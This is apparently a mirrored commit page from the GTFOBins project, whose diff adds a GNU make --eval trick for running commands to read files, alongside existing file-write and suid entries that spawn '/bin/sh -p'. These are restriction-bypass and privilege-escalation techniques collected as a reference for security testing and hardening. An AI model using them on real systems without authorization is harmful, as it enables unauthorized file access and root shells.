mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2025-12-27 18:51:41 +01:00
Merge c04b99e12b75848e191659e2ae7a003a0c4905fe into b29f2cfde1c72e4ea5191e49604e923bbda98461
This commit is contained in:
commit
05b497eaf2
@ -10,6 +10,13 @@ functions:
|
||||
code: |
|
||||
LFILE=file_to_write
|
||||
make -s --eval="\$(file >$LFILE,DATA)" .
|
||||
|
||||
file-read:
|
||||
- description: Requires a newer GNU `make` version.
|
||||
code: |
|
||||
CMND='cat file_to_read'
|
||||
make -s --eval=$'x:\n\t-'"$CMND"
|
||||
|
||||
suid:
|
||||
- code: |
|
||||
COMMAND='/bin/sh -p'
|
||||
|
||||
Loading…
Reference in New Issue
Block a user